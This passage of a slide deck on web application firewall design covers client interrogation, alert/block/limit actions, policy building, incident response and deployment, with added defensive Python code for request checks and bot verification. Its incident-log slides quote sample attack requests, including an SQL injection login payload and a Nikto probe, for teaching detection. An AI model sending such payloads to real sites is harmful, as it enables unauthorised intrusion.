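Slides 54 to 59 list the restriction checks and response sanitation as tables. The following is an added example for this page, not code from the deck or a vendor: the size, HTTP/RFC and meta-character restrictions run over already-parsed entities, the two-step rDNS verification of a search-engine client with an injectable resolver (so it runs offline against a constructed fake), and response sanitation that masks a pattern once it repeats more than the tolerated count. The limits, the allowed FQDN suffixes, the redaction rules, the fake resolver data and the documentation-range IP addresses are my own assumptions.

```python
"""Added example: restriction checks, rDNS bot verification and response
sanitation over parsed WAF entities.  Illustrative policy, not a vendor's."""
import re
import socket

RESTRICTIONS = {
    "methods": {"GET", "POST", "HEAD"},
    "protocols": {"HTTP/1.1", "HTTP/2"},
    "param_value_len": (3, 130),       # slide 55: 3..130 chars
    "deny_metachars": set("'/<"),      # slide 57: ' / < denied, # $ % & allowed
}


def check_request(ent: dict, policy=RESTRICTIONS) -> list:
    """Return [(restriction, detail), ...]; an empty list means clean."""
    v = []
    if ent["method"].upper() not in policy["methods"]:
        v.append(("method", ent["method"]))
    if ent["protocol"] not in policy["protocols"]:
        v.append(("protocol", ent["protocol"]))
    hosts = [val for name, val in ent["headers"] if name.lower() == "host"]
    if len(hosts) != 1:
        v.append(("host-header-count", len(hosts)))
    v += [("empty-header", name) for name, val in ent["headers"] if val == ""]
    everything = ([ent["url"]] + [val for _, val in ent["headers"]]
                  + [val for _, val in ent["params"]])
    if any("\x00" in s or "%00" in s for s in everything):
        v.append(("null-byte", "request"))
    lo, hi = policy["param_value_len"]
    for name, val in ent["params"]:
        if not lo <= len(val) <= hi:
            v.append(("size", f"{name}={len(val)} chars"))
        bad = sorted(set(val) & policy["deny_metachars"])
        if bad:
            v.append(("metachar", f"{name}:{''.join(bad)}"))
    return v


def verify_search_bot(ip: str, suffixes=(".googlebot.com", ".google.com"),
                      resolver=socket) -> bool:
    """rDNS check: reverse-resolve the source IP, require an allowed domain,
    forward-resolve that name and require the same IP in the answer."""
    try:
        fqdn = resolver.gethostbyaddr(ip)[0].rstrip(".")
        if not fqdn.lower().endswith(suffixes):
            return False
        return ip in resolver.gethostbyname_ex(fqdn)[2]
    except OSError:
        return False


# Response sanitation: name -> (regex, occurrences tolerated before masking)
LEAK_PATTERNS = {
    "credit-card": (re.compile(r"\b\d{12,19}\b"), 2),
    "credential": (re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+:\s*\S+"), 3),
    "server-path": (re.compile(r"/var/htdocs/\S*"), 0),
}


def sanitize_response(body: str):
    """Mask a pattern once it appears more often than tolerated.
    Returns (cleaned_body, {pattern: occurrences})."""
    findings = {}
    for name, (rx, tolerated) in LEAK_PATTERNS.items():
        n = len(rx.findall(body))
        if n > tolerated:
            findings[name] = n
            body = rx.sub("[redacted]", body)
    return body, findings


class FakeResolver:
    """Constructed stand-in for DNS so the rDNS check runs offline.  The
    second IP spoofs a Googlebot PTR name whose forward record does not
    point back at it."""
    ptr = {"198.51.100.7": "crawl-198-51-100-7.googlebot.com",
           "203.0.113.9": "crawl-198-51-100-7.googlebot.com"}
    fwd = {"crawl-198-51-100-7.googlebot.com": ["198.51.100.7"]}

    def gethostbyaddr(self, ip):
        if ip not in self.ptr:
            raise OSError("NXDOMAIN")
        return (self.ptr[ip], [], [ip])

    def gethostbyname_ex(self, host):
        return (host, [], self.fwd[host])


if __name__ == "__main__":
    print(verify_search_bot("198.51.100.7", resolver=FakeResolver()))   # True
    print(verify_search_bot("203.0.113.9", resolver=FakeResolver()))    # False
```

Passing `resolver=socket` in production makes the same function use real PTR and A lookups; the forward step is the one that defeats a spoofed PTR record, since anyone controlling reverse DNS for their own address space can name it whatever they like.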
  60. Protection elements (PE) recap: entities (protocol, payload, user input) → detections (1. signatures, 2. anomaly, 3. restrictions, 4. client interrogation) → prevention action; parser, traps, enforcer.
  61. Client interrogation: who is the client? 1. simple bot; 2. full-browser bot; 3. full human bot. Definition: HTTP client inspection for understanding who the HTTP client is.
     • Pros: helps identify bots / automation; examines the attack agent; works beyond the IP level; powerful together with the other detections
     • Cons: adds a round trip and delays load time; can be tricked; does not block by itself
     • Types: I. CAPTCHA; II. client capabilities, levels 1-3; III. source ID (SID)
     • Attacks: bots / botnets for any attack; automated traffic; attack agents
  62. Client interrogation, concept. The user's browser sends its first request, GET /sell.php; the WAF (CI) sees it is not verified and returns the interrogation instead of forwarding it; the browser renders the HTML, runs the interrogation and returns its results; if they fail the request is dropped / blocked, if they pass the WAF forwards the request, returns the HTTP response and marks the client verified; later requests (GET /img.png) are forwarded as verified.
     Interrogation tests: CLI? supports JS? supports cookies? mouse movements? event sequence? does the UA fit the screen resolution? framework?
  63. Client interrogation I: CAPTCHA. "Type the words: SIRT#1". A human types SIRT#1; an automated client (AUTO) answers ??!?!?!!, so it is not human.
  64. Client interrogation II: capabilities, "only browsers are allowed here". Which attack agent is behind IP A, IP X and IP Y? CI results: allowed browser: yes; CLI: no; JS capable: yes; cookie set: yes.
  65. Client interrogation III: SID (source ID), "who are you?". Measuring the IP / SID binding:
       IP X   SID 9883    10 RPS
       IP X   SID 1253    50 RPS
       IP Y   SID 2873     0 RPS
       IP Z   SID 4948   100 RPS
       IP Z   SID 1151    20 RPS
       IP Z   SID 2222    12 RPS
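Slides 62 to 65 describe the interrogation round trip and the SID binding without showing the mechanics. The following is an added example for this page, not code from the deck or any vendor: the capability test is a cookie that is set only from JavaScript, so a CLI client that does not execute the challenge page never becomes verified; the cookie value is an HMAC token bound to the source IP with an expiry, and it carries a source id (SID) so that verified requests from one IP can be counted per SID, which is the slide's IP/SID table. The cookie name, token layout, TTL, the key and the sample addresses are my own assumptions.

```python
"""Added example: client interrogation with a JavaScript-set, IP-bound
HMAC cookie carrying a source id.  Illustrative code for this page."""
import hashlib
import hmac
import secrets
from collections import Counter

COOKIE = "ci"          # assumed cookie name


class ClientInterrogator:
    def __init__(self, secret: bytes, ttl: int = 600):
        self.secret, self.ttl = secret, ttl
        self.sid_requests = Counter()          # (ip, sid) -> verified requests

    def _mac(self, ip: str, sid: str, exp: int) -> str:
        msg = f"{ip}|{sid}|{exp}".encode()
        return hmac.new(self.secret, msg, hashlib.sha256).hexdigest()[:32]

    def issue(self, ip: str, now: int) -> str:
        """Token = sid.expiry.mac, bound to the source IP."""
        sid, exp = secrets.token_hex(4), now + self.ttl
        return f"{sid}.{exp}.{self._mac(ip, sid, exp)}"

    def verify(self, ip: str, token: str, now: int):
        """Return the SID if the token is well-formed, unexpired, bound to
        this IP and carries a genuine MAC; otherwise None."""
        try:
            sid, exp, mac = token.split(".")
            exp = int(exp)
        except ValueError:
            return None
        if exp < now or not hmac.compare_digest(mac, self._mac(ip, sid, exp)):
            return None
        return sid

    def handle(self, ip: str, cookies: dict, now: int) -> dict:
        """Decide for one request: forward it (verified) or answer with the
        interrogation page instead of touching the application."""
        sid = self.verify(ip, cookies.get(COOKIE, ""), now)
        if sid is None:
            token = self.issue(ip, now)
            # The cookie is set by script: a client that cannot run JS or
            # does not keep cookies never comes back verified.
            body = (f"<script>document.cookie='{COOKIE}={token}; path=/';"
                    "location.reload();</script>")
            return {"action": "challenge", "status": 200, "token": token, "body": body}
        self.sid_requests[(ip, sid)] += 1
        return {"action": "forward", "sid": sid}

    def sids_for(self, ip: str) -> dict:
        """IP/SID binding view: verified requests per SID behind one IP.
        Many SIDs at one IP suggests a NAT or proxy; one SID with a high
        count is one busy client."""
        return {sid: n for (i, sid), n in self.sid_requests.items() if i == ip}


if __name__ == "__main__":
    ci = ClientInterrogator(secret=b"constructed-demo-key")
    first = ci.handle("192.0.2.10", {}, now=1000)
    print(first["action"])                                          # challenge
    second = ci.handle("192.0.2.10", {COOKIE: first["token"]}, now=1001)
    print(second["action"], ci.sids_for("192.0.2.10"))               # forward {sid: 1}
```

Binding the token to the source IP is what stops a botnet from solving the interrogation once and distributing the cookie; the trade-off, as the slide's cons note, is an extra round trip for every new client and a false challenge for users whose address changes mid-session.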
  66. Traps → detections: signatures (pattern matching); anomaly (aggregation and thresholds); client interrogation (HTTP client inspection); restrictions (allow / block lists).
  67. Protection elements (PE): entities (protocol, payload, user input) → detections (signatures, restrictions, anomaly, client interrogation) → prevention actions (alert, block, limit, follow up); parser, traps, enforcer, between the web clients and the application.
  68. ALERT, to the WAF admin: the most basic but the most important action; the "money time" and the security-visibility feedback loop. Events from a browser, a user IP or an attacker show up in WAF reporting (GUI): ❑ dashboard (alert / critical) ❑ graphs (visual) ❑ statistics (tables) ❑ logs (request logs); and through external alert utilities: ❑ SMS ❑ messaging (Slack) ❑ email.
  69. BLOCK, to end users: a blocking page ("This request has been blocked. Your traffic is violating the site policy. If this continues, please contact our support 111-111. Block ID: 10ABC"), a TCP FIN / RESET, or dropping the connection. Semi-blocking: scrubbing / stripping / cloaking.
  70. LIMIT: rate limit on the client side (limiting the RPS of a specific IP) or on the server side (limiting RPS on the site, on a specific URL such as search.php or index.php, or on parameter q); limiting time; limiting access (4-hour ban). Advantages: slows down / delays the attack; less aggressive than blocking; typically works on anomalies.
  71. FOLLOW UP: redirect (302 to HOME, sending the browser back to the main page) or honeypot (sending users to a fake app for inspection, keeping them busy). Advantages: delays the attack; hides the blocking actions; lets you investigate the activity.
  72. FOLLOW UP, soft block vs hard block. Soft block: the site keeps answering, but uselessly ("Wrong username/password, please try again" on the login form; "Not available" or "Please try again later" behind the menu Home | Buy | Login | Help), a mild form of retaliation. Hard block: the blocking page ("This request has been blocked ... Block ID: 10ABC").
  73. WAF data plane, request / response process: a request arrives → parser engine → traps engine (signatures, restrictions, anomaly, client interrogation over protocol, payload and user input) → enforcer engine (alert, block, limit, follow up); the response arrives → the same parser → traps → enforcer chain.
  74. 74. 70295 © Traffic visibility to control the users, Foe or Friend *
  75. 75. 70295 © WAF – inline traffic inspector WEB APPLICATION Application/s Request handler/s Database/s Expected Traffic Footprint Attack Traffic Footprint No Services for you WEB APP OWNER ✓ Allow valuable traffic ✓ Stop attack Welcome P D E ©
  76. 76. 70295 © Entity 1.PROTOCOL 2.PAYLOAD 3.USER INPUT Detections 1.SIGNATURES 2.ANOMALY 3.RESTRICTION 4.CLIENT INTERROGATION Prevention 1.ALERT 2.BLOCK 3.LIMITING 4.FOLLOW UP E D P WAF – PE and Rules Rule PROTECTION ELEMENTS (PE) ©
  77. 77. 70295 © Rules Concept PROTOCOL PAYLOAD – HEADERS USER INPUT SIGNATURES ANOMALY RESTRICTIONS CLIENT INTERROGATION ALERT BLOCK LIMIT FOLLOW UP • Detection ENFORCER TRAPS PARSER E D P • Entity • PA user input parameter value Signature SQLi select * from Blocking page
  78. 78. 70295 © WAF policy Policy PE • Entities • Detections • Prevention E D P E D P E D P • Rule • Rule sets Rule Rules Protection elements Protection rule Protection policy
  79. 79. 70295 © ❑ Allow ❑ Monitor ❑ Block Brute force Prevention Rules E D P E D P E D P E D P P ADDoS Prevention Rules Vulnerability Hunting Prevention Rules E D P Bot/Botnet Prevention Rules APP © E D P E D P E D P E D P E D
  80. 80. 70295 © A. What you want B. How do to it E D P ? ? ? • App Risk level • Human labor • WAF capabilities WAF policy – building
  81. 81. 70295 © WA-CAV BRUTE FORCE ADDoS WEB EXPLOITS AUTOMATED ATTACKS Brute force Rules ADDoS Rules Web Exploits Rules Bot/Botnet Rules WAF POLICY Policy Goal: rule sets to mitigate WA-CAV Risk
  82. 82. 70295 © Labor How many people • Knowledge • Skill sets • Experience Working hours: 1 person per 20 base polices Off hours: 1 person – monitoring / acting • Web app type : traffic, users, criticality • Polices number / apps (total) • Policy complexity – number of PE’s (features) • Coverage – follow the sun *Estimations
  83. 83. 70295 © Capabilities •SQLi •XSS •LFI/ RFI •RCE •CSRF Web Exploits •BF •CS •PS ATO •floods •Loads DDoS Parser: • HTML • HTTP • API • JSON Detections : • Signatures • Anomaly • Restrictions • Client intg Enforcer • Alert • Block • Limit • Follow up Edge / Perimeter / Mesh Vendor A Vendor B Vendor C Vendor X
  84. 84. 70295 © ►What you want ►How do to it E D P ? WAF policy – building
  85. 85. 70295 © How to build a policy Create Rule Verify Rule Enforce Rule A good rule: ▪ No false positive ▪ Blocking the defined criteria E D P C V E Pass traffic: • No hits – enforce • Hits – keep in alert mode • Define the entity/ies • Configure the detections • Apply prevention action (beyond alert)
  86. 86. 70295 © Ways to build polices ➢ Manual ➢ Heuristics ➢ Statistics ➢ Aggregations Protocol Payload User input SIGNATURES RESTRICTIONS ANOMALY CLIENT INTERROGATION ALERT BLOCK LIMIT FOLLOW UP Define entity Config detection Apply prevention action Traffic Trusted traffic concept No attack traffic. If hit -> false positive
  87. 87. 70295 © Attacks •Brute force •DDoS •Web Exploit •Bot/Botnet Mitigations •Anti ATO •Anti Floods •Anti RCE •Anti Automation PE •Anomaly, CI •Anomaly, CI, UA •Signature, meta char enforcement •Session anomaly, structure, position Mitigations = Detection + Prevention
88. False positives – the enemy of security value
   False positive – identifying good traffic as bad traffic, i.e. the rule gets hit but it is not an attack
   [Diagram: a real attack and a valuable user both hit the same E-D-P rule; the valuable user is blocked on a false positive rule. Why?]
89. Rules maturity / life cycle
   Create rule → Verify rule → Enforce (timeline): Alarm – no hit; Alarm – hit; Blocking – hit
   Outcome:
   a) Hits are false positives – refine or keep in alert
   b) Hits are attack – blocked
   c) Hits are FP and RA – separate the rules or add other mitigations
   d) No hits – block (per the timeline)
   e) Hits (few) – keep in alert (default)
90. False positive examples
   Entity: bad parsing; unsupported protocol; bad payload
   Detections: Signatures – known word; Anomaly – wrong thresholds; Restrictions – legitimate meta char; Client interrogation – wrong ID
   Prevention: Block – good users; Honeypot – wrong data
91. WAF policy – features
   [Diagram: WAF policy with Brute force, ADDoS, Vulnerability Hunting and Bot/Botnet rule sets (E-D-P) in front of the APP]
   ❑ Signature ❑ User agent ❑ Headers ❑ User input ❑ Normalization engine ❑ Brute force protection ❑ Distributed brute force ❑ Prevention ❑ Ban for X hours ❑ CAPTCHA ❑ Bot protection ❑ Web scraping protection ❑ Log all transactions ❑ Slow post detection
92. Reporting – security reporting
   1. Data plane – WAF engines
   2. Control plane – settings
   3. Reporting – visualization: Graphs, Statistics, Logs, Dashboard
93. Dashboard – App health, Incidents, WAF security level, Traffic (SIRT WA-CAV)
   Incidents: E:H D:S BLOCK; E:URL D:A ALARM; E:IP D:R RATE LIMIT (severity Critical / High / Medium; volumes 1 IP 100 req, 1 IP 10 req, 10 IP 1000 req)
   WAF security level: Brute force 60%, App DDoS 70%, Web exploit 50% [chart per App 1 – App 4, 56%–72% axis]
   WAF health (load avg % / numbers): CPU 65% (16 core); Memory 55% (64GB); Throughput 35% (6.66G); RPS 25% (111,000)
   Status: 99 LIVE – I'M OK
94. Statistics and graphs
   Aggregated by source IP (three value columns as on the slide; the column headers are not given):
   Aggregated: 21.21k | 23.57 | 36.72k
   10.10.1.12: 2.75k | 3.05 | 4.08k
   172.29.46.44: 2.26k | 2.51 | 5.27k
   192.168.1.1: 2.25k | 2.50 | 3.10k
   172.16.184.126: 2.23k | 2.48 | 4.64k
   192.168.1.12: 2.01k | 2.23 | 2.82k
   Top URLs by RPS: / 21.21k; /search.php 2.75k; /login.php 2.26k; /sell.php 2.25k; /user_login.php 2.23k; /blog.php 2.01k
   Graphs: RPS @ URL over time; RPS @ Login.php per source (10.10.10.0, 10.10.20.0, 10.10.30.0, 10.10.40.0, 10.10.50., total)
95. Security incident log (aka request/response logs)
   Incident list: R1, R2, R3, R4 ... Rx
   R1 (incident summary):
     GET /3143551953695648522.php HTTP/1.1
     User-Agent: Mozilla/5.0
     Host: sirt.club
     Entity: 3143551953695648522.php; Detections: meta char in URL ‘; Prevention: blocking page; Time: 11:12:13; Source IP: 10.0.0.138
   R1 (raw request):
     GET /314355195369564852’2.php HTTP/1.1
     User-Agent: (/Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101/,;/>
     Pragma: no-cache
     Cache-Control: no-cache
     Content-Length: -40
     Host: sirt.club
   R2 (raw request):
     TRACK / HTTP/1.1
     Connection: Keep-Alive
     Host: sirt.club
     User-Agent:: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKip/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
     Trace-Test: Nikto
   R3 (raw request):
     OPTIONS /API%20/V1/login HTTP/1.1
     User-Agent: Mozilla/5.0 Firefox/11.0
     Accept: image/webp,*/*
     Accept-Language: en-US,en;q=0.5
     Host: sirt.club
96. Security incident – the moment we have all been waiting for – the money time! (IR Win)
97. Security Incident Response – the money time
   ▪ Applies to a security product/service ▪ Deals with the modern threat landscape ▪ Small clear actions ▪ Rapid process ▪ Agile IR
   ❑ Fast mitigation ❑ Easy to use ❑ Scalable ❑ Repeatable ❑ Measurable
98. SIR flow: INVOCATION → 1. AM I → 2. MITIGATION → 3. RESPONSE → BTR
99. Invocation
   Invocation – a possible security related issue/s needs attention, now
   Sources: ► Security device ► App monitoring ► Humans
   (next step: 1. AM I)
100. Invocation types
   ► Security device – WAF protection elements (policy)
   ► 3rd party security / monitoring software or services
   ► Humans – customer complaints, notification from other department personnel
   Support load: "Hello support: your app is NOT working !?!?"
   App dude: "hey, it's eating resources $$$"
101. Invocation – act!
   WAF notification center: ▪ Dashboard alert ▪ Email ▪ SMS ▪ Instant messaging ▪ Phone call
   ATTACK! message: • What happened • How bad it looks • How long
102. 1. AM I – Am I under attack?
   Declare the incident type and determine the impact
   Incident type: RA – Real attack; FP – False positive; FA – False alarm
   Impact: • S1 – Service down • S2 – Major impact • S3 – General impact
   [Diagram: impact and incident type feed the decision; BTR when there is nothing to handle]
103. 1. AM I – severity for a real attack
   • Severity: S1 – Status: Active attack – Damage: Major – Affecting: ❑ Service ❑ Data ❑ Compute – Act: Now (4H – 12H)
   • Severity: S2 – Status: Active / Imminent – Damage: Moderate / Potential – Affecting: ❑ Service ❑ Data ❑ Compute – Act: Now / Soon (12H – 24H)
   • Severity: S3 – Status: Security related – Damage: Minor – Affecting: ❑ Service ❑ Data ❑ Compute – Act: Soon / Later (24H – 3D)
104. 1. AM I – severity for false positives
   • S1 – Service down – FP: Mass – Damage: Visible blocking – Affecting: ❑ Service ❑ Data ❑ Compute – Act: Now (4H – 12H)
   • Severity: S2 – FP: Many – Damage: Affecting traffic – Affecting: ❑ Service ❑ Data ❑ Compute – Act: Now / Soon (12H – 24H)
   • Severity: S3 – FP: Specific – Damage: Passive FP – Affecting: ❑ Service ❑ Data ❑ Compute – Act: Soon / Later (24H – 3D)
105. 2. MITIGATION – how to mitigate (Seek & Destroy)
   I. Search suspicious indicators (3SIN)
   II. Compose prevention rule (PR)
   Find Suspicious Indicators (SIN) & Compose Prevention Rule (PR)
   • Detection + Prevention = Mitigation
106. 2. MITIGATION – I. Suspicious indicators
   Attack elements: ▪ Vulnerability ▪ Attack surface ▪ Attack agent ▪ Exploit ▪ Attack vector ▪ AMO
   Protection elements: ▪ Signatures – pattern matching ▪ Anomaly – aggregation and thresholds ▪ Restrictions – allow / block lists ▪ Client interrogation – HTTP client inspection
   Reporting: Graphs, Statistics, Logs, Dashboard
107. 2. MITIGATION – I. Suspicious indicators in the WA-CAV policy
   Web exploits (• SQLi • XSS • LFI / RFI • CSRF • RCE) -> Signatures, Restrictions
   ATO (• BF • CS • PS) -> Anomaly, Client interrogation
   DDoS (• Floods • Loads) -> Anomaly, Client interrogation, Restrictions
108. 2. MITIGATION – I. Suspicious indicators: SIRT FIP (Forensic Investigation Procedure)
   Classify sources; Examine patterns
   Sample request from the Internet:
     POST / login.php HTTP/1.1
     Connection: Keep-Alive
     Host: sirt.club
     Content-Length: 59
     User-Agent: Apache-HttpClient/4.5.7 (Java/1.8.0_221)
     Content-Type: application/x-www-form-urlencoded

     username=' or 1=1--&password=123456action=login
109. 2. MITIGATION – how to mitigate (Seek & Destroy)
   I. Suspicious indicators (3SIN)
   II. Prevention rule (PR)
   Find Suspicious Indicators (SIN) & Compose Prevention Rule (PR)
   • Protection rules – general policy – policy
   • Prevention rule – specific attack – SIR
110. 2. MITIGATION – II. Prevention rule (PR)
   An E-D-P prevention rule against the WA-CAV: Brute force, ADDoS, Vulnerability hunting, Automated attacks
   • Wide vs narrow rules
   • Specific rule vs general rule
   Goal: • Prevention rule / features • Few prevention rules / features
111. 3. RESPONSE – Apply & Verify
   I. Apply mitigation strategy
   II. Monitor mitigation
   Apply the prevention rule and verify the attack mitigation
112. 3. RESPONSE – apply prevention rule (control plane)
   [Diagram: MGMT pushes the E-D-P prevention rule to the policies facing the clients]
113. 3. RESPONSE – Apply & Verify (repeated: I. Apply mitigation strategy II. Monitor mitigation – apply the prevention rule and verify the attack mitigation)
114. 3. RESPONSE – BTR monitoring
   [Graphs: RPS per URL while monitoring the attack, and after mitigation]
   ✓ BTR – monitoring attack
   Attacker reactions to watch for: • Return – bypass • Return – different approach – same attack • Revenge – other attack
   ✓ BTR – EoA – end of attack
115. BTR – Back To Routine
   Declaring Back to Routine when the attack is being blocked or the attack stopped (IR Win)
   ✓ Damage evaluation report
   ✓ Severity is 0
116. Incident response – timeline
   Recon → Attack start → Invocation → AmI → Mitigation → Response → Monitoring → BTR
   A. Response time (invocation to mitigation) B. Recovery time C. Human work time
   What we want to know: A. Response time B. Recovery time C. Working time
117. Incident report template
   Incident details: Incident name: ___ | CAV type: ___ | Severity: ___ | App name: ___ | App type: ___ | Attack type: ___ | Win/Lose: ___
   Attending: ▪ SIRT iMgr ___ ▪ SE Focal ___ ▪ App Dev ___ ▪ Dev Ops ___ ▪ Mgmt ___ ▪ Auditor ___ ▪ CxO notification: Y/N, datetime
   Times: Response time ___ | Recovery time ___ | Working time ___
   AE list | PE list | Feature name | RCA | Damage control
   Highlights | Lowlights
   Cost: o Direct ___ o Indirect ___ o 3rd party ___ Total IR cost: ___
   Opportunities: ▪ Short term ▪ Long term
118. SIR decision flow
   1. AM I (RA / FP) → 2. MITIGATIONS: RA → Seek / Destroy; FP → Seek / Fix (fine tune) → 3. RESPONSE: Apply / Verify → BTR
119. Information sources
   Graphs, Statistics, Logs and Dashboard feed every step: Invocation → 1. AM I → 2. MITIGATION → 3. RESPONSE → BTR
120. Auto SIR – maximum security value
   An optimized policy (OPR) is detecting and preventing attacks – automatically
   [Diagram: WAF policy with Brute force, ADDoS and Vulnerability Hunting rule sets (E-D-P) against the WA-CAV in front of the APP]
121. SIR levels
   Who runs the flow (Invocation → 1. AM I → 2. MITIGATION → 3. RESPONSE → BTR): Org, Division, Team, Auto
122. Planning the right security architecture is your key for success
123. WAF deployment modes
   Path: Home user PC browser → www.site.com → WAF → Web servers → Application servers → Database servers
   Tap mode: the WAF sees a copy of the traffic
   Inline WAF mode: request (Req) and response (Res) pass through the WAF
124. HTTP transaction – inline device
   Round trip: TCP/IP connection → TLS handshake → HTTP request; Ingress → WAF processing time → Egress; Latency (T)
   Metrics: • RPS • TPS (client, WAF, app) • Latency • Throughput
   App resources: • CPU • Memory • Network • Response size
   WAF resources: • CPU • Memory • Network
125. WAF environment
   Environment: On prem, Cloud – public / private, Multi cloud, Hybrid
   Classic path: Internet → Firewall → ADC/LB → WAF → Web servers → Application servers → Database servers
   Modern path: Clients → Edge → Perimeter → WAF NG → App mesh (NF, NG, abstraction layers, applications, request handlers, databases)
126. WAF locations – edge / perimeter / mesh
   Edge WAF: in front of the whole site, facing the HTTP clients
   Perimeter WAF: in front of the web servers
   Mesh WAF: between NFs, app servers and {API}
127. WAF location: Edge
   The Edge WAF takes the FQDN and passes sanitized traffic to the web servers
128. WAF location: Edge – POPs
   Internet → Edge POP1 / POP2 (Edge WAF) → App1 Zone 1 / App1 Zone 2
129. WAF location: Perimeter
   Perimeter WAF in front of: Web site, Mobile app / {API}, Application/s, Request handler/s, AAA, Database/s; reporting to SIEM and Analytics; serving web bots and users from the Internet
130. WAF location: Perimeter 360
   Perimeter 360 WAF also covers the abstraction layer, data storage, orchestration and the DevOps channel (API)
131. WAF location: Mesh
   Mesh WAF in a micro services / API app: Login, Searching, Cart, Mgmt, Payment, Handlers, DBs, Browsers, machine to machine, CP
   CI/CD: Continuous integration, Continuous delivery, Continuous deployment (</code..> → CD)
132. WAF strategies
   WAFx1: Edge / Perimeter (CI, A, SIG/R)
   WAFx2: Edge + Perimeter (CI on the edge; A, SIG/R on the perimeter)
   WAFx3: Edge + Perimeter + Mesh (CI, A, SIG/R spread across the three)
133. WAF strategies (continued)
   1. Edge screening WAF 2. Perimeter WAF 3. Mesh WAF 4. CP/Admin panel WAF 5. 3rd party WAF 6. CD or CI/CD WAF 7. Scaling WAF – multi clouds 8. Scaling WAF – hybrid apps
   [Diagram: web requests/responses, 3rd party HTTP, FQDN, NF, API, Cloud B]
134. Managing the software and security
   Layers: Hardware → Operating system → Network → WAF → Configuration / Setups / Updates → Policy building → SIR → Reporting (CP); Cloud; DP – PE
   Who manages each layer: vendor manages / you manage / you or the vendor manage
135. Security management – types
   Managed Security (WAF aaS) – Vendor aaS: ❑ Security report ❑ SIR ❑ Policy ❑ Configuration ❑ Setups ❑ Create / updates ❑ Infrastructure – upgrades ❑ Deployment ❑ OS – Scaling
   Security Management – You: ❑ Security report ❑ SIR ❑ Policy ❑ Configuration ❑ Setups – updates ❑ Create / update; remaining: ❑ Infrastructure ❑ Deployment – upgrades ❑ OS – Scaling
   Full Security Management – You: ❑ Security report ❑ SIR ❑ Policy ❑ Configuration ❑ Setups ❑ Create / updates ❑ Infrastructure – upgrades ❑ Deployment ❑ OS – Scaling
136. Security management – unified reporting
   One security mgmt / WAF mgmt (mono) with unified reporting over web, cloud, NF and mesh deployments
137. WAF architecture capabilities (DSMM)
   App: ❑ Classic ❑ Modern ❑ Mix
   Environment – Cloud: ❑ Cloud: public ❑ Cloud: private ❑ Multi cloud ❑ Hybrid (Cloud <-> OP)
   Environment – On prem: ❑ On prem: shared hosting ❑ On prem: dedicated hosting ❑ Multi on prem ❑ Hybrid (OP <-> Cloud)
   Management: ❑ For you ❑ Semi ❑ You
   WAF locations: ❑ Edge ❑ Perimeter ❑ Perimeter (360) ❑ Mesh ❑ MonoMesh
   Software – SW type: ❑ HW OS SW ❑ OS SW ❑ SW
   Virtualizations: ❑ vOS ❑ vSW – Container ❑ vSW – K
   Security Mgmt – Sec OPS – Policy level: ❑ ID/PS ❑ Bot MGR ❑ WAF ❑ WAF NG
   Security reporting: ❑ Security center (learning) ❑ WAF reporting ❑ Graphs ❑ Risk reporting ❑ Statistics ❑ Mitigation reporting ❑ Event log ❑ Forensics
   OPS – Deployment: ❑ ISO file ❑ RPM ❑ VM image
   OPS – Config: ❑ API ❑ Config file ❑ GUI
138. "Keep it up to date and never drop the ball; YOU are the last in line and own it"
   Policy, Update, Upgrade, MGMT, HA, Utility
139. WAF structure
   Clients → DP WAF (agent) ← 2. Control plane – MGMT (CI/CD) → 3. Reporting – visualization
140. WAF software types
   Three delivery forms over the same stack (Hardware, Operating system, Network):
   a) Hardware + Operating system + WAF software (appliance)
   b) Operating system + WAF software
   c) WAF software only
141. Platform
   Virtual – OS (vOS, vOS, vOS); Virtual – container (C1, C2, C3); Virtual – pod (P1, P2, P3); bare hardware
   Platform stack: • WAF software • Operating system • Hardware (or • WAF software • Operating system, or • WAF software)
   Deployment: ❑ ISO ❑ SW
142. Deployment topologies
   Same platforms (vOS / container / pod / hardware); Data plane (CI, A, SIG/R), Control plane, Reporting
143. High availability
   AKA fault tolerant – when the master WAF fails
   Active / Active; Active / Stand by; N+1 concept
144. Load management
   Load balancing, Cluster, Scaling (traffic in RPS over time across WAF 1, WAF 2, WAF 3)
   N+1: Primary (A), Secondary (burst); Fault tolerance: Stand by; Active / Active / Active; New / Old
145. WAF capacity planning – LB
   Session persistence: a new session goes to WAF #1 or WAF #2 → App #1 / App #2; Stand by – online
146. WAF capacity planning – cluster
   WAF cluster with SB (stand by) units on vOS / container / pod / hardware; Stand by – online
147. WAF capacity planning – scaling
   The sync challenge; Stand by – offline
148. Upgrade / updates procedure
   Active / Standby (units A and B):
   a) Update / upgrade on B (SB)
   b) Testing – smoke test or rollback
   c) Switch to the active unit (A -> B)
   d) Make A stand by
   e) Update / upgrade on SB (A)
   f) Verify ok
   New / Old:
   a) Create new from ISO – B
   b) Import config (from A)
   c) Testing – smoke test or new install
   d) Route new traffic – B
   e) Kill old WAF – A
149. Centralized Management (CM)
   Policies: ALL/APP1, ALL/APP2, LOGIN/APP2, 20, 30, 40
   Services: IP:80, IP:8080, IP:8008
   Apps: APP1, APP2, App #20, App #30, App #40
150. Management types
   i. Policy management – CRUD – CP (P.MGMT)
   ii. WAF management – updates / upgrades (D.MGMT)
   iii. Reporting – visualization (R.MGMT)
151. Management levels: → Site → WAF → Policy
   (R.MGMT spanning web, cloud, NF and mesh)
152. Configuration
   1. Data plane; 2. Control plane – settings (GUI, API, Config file); 3. Reporting – visualization
153. Configuration – GUI
   Policy name: main_App | notification (21) | incident log | support panel
   Create new parameter: q on search.php; Parameter name: ___; Parameter value: ___
   Create signatures: ❑ Information ❑ Generic ❑ CVE
   Online help | Contact vendor support
154. Configuration – API
   WAF API collection: Policy {Main_app}; Parameter {q}; Signatures {specific CVE family}; Prevention action {alert, blocking page}
   API clients: Mobile client app, Mobile browser, LT/PC browser, LT/PC CLI, 3rd party; NF and WAF NG expose {API}
155. Configuration – config file
   WAF config file:
     Policy: Main_app
     <config>
     Define Parameter : q
     Configure signatures – specific CVE
     Apply – prevention action: alert , blocking page
     </config>
     #load new config
156. Set ups – logging
   Log format: ✓ Request: URL, headers, QS, PD, meta character ✓ Response: headers, post data, meta data ✓ WAF: all reporting (raw) ✓ WAF meta data: signature, hit on, CRLF, encoding
   Ingress: log repository → indexing → reporting
   Egress: ✓ Syslog ✓ SIEM ✓ Repo
157. Set ups – ICAP
   File upload handed to ICAP: virus – block; no virus – pass
158. Reporting
   1. Data plane – WAF engines; 2. Control plane – settings; 3. Reporting – visualization
